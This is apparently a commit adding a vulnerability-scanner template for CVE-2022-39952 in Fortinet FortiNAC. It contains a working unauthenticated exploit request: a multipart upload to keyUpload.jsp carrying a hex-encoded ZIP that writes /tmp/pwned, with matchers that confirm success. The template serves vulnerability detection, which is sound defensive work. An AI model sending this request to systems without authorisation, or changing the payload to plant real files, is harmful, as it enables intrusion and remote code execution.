add CVE-2022-39952

cves/2022/CVE-2022-39952.yaml

@@ -0,0 +1,45 @@
+id: CVE-2022-39952
+
+info:
+  name: FortiNAC Unauthenticated Arbitrary File Write
+  author: dwisiswant0
+  severity: critical
+  description: |
+    A external control of file name or path in Fortinet FortiNAC versions
+    9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11,
+    8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7
+    may allow an unauthenticated attacker to execute unauthorized code or
+    commands via specifically crafted HTTP request.
+  reference:
+    - https://www.fortiguard.com/psirt/FG-IR-22-300
+    - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
+  remediation: Upgrade to FortiNAC version 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above
+  tags: fortinet,fortinac,cve,cve2022,fileupload,rce
+
+variables:
+  boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}"
+  payloadHex: "504b030414000000000031b155567e5304d9050000000500000009000000746d702f70776e656470776e6564504b0102140314000000000031b155567e5304d90500000005000000090000000000000000000000b48100000000746d702f70776e6564504b05060000000001000100370000002c0000000000"
+  # payloadHex = /tmp/pwned, content "pwned"
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/configWizard/keyUpload.jsp"
+      - "{{BaseURL}}:8443/configWizard/keyUpload.jsp"
+    headers:
+      Content-Type: "multipart/form-data; boundary={{boundaryId}}"
+    body: |
+      --{{boundaryId}}
+      Content-Disposition: form-data; name="key"; filename="{{to_lower(rand_text_alphanumeric(8))}}.zip"
+
+      {{hex_decode(payloadHex)}}
+      --{{boundaryId}}--
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "zipUploadSuccess"
+          - "SuccessfulUpload"
+        condition: and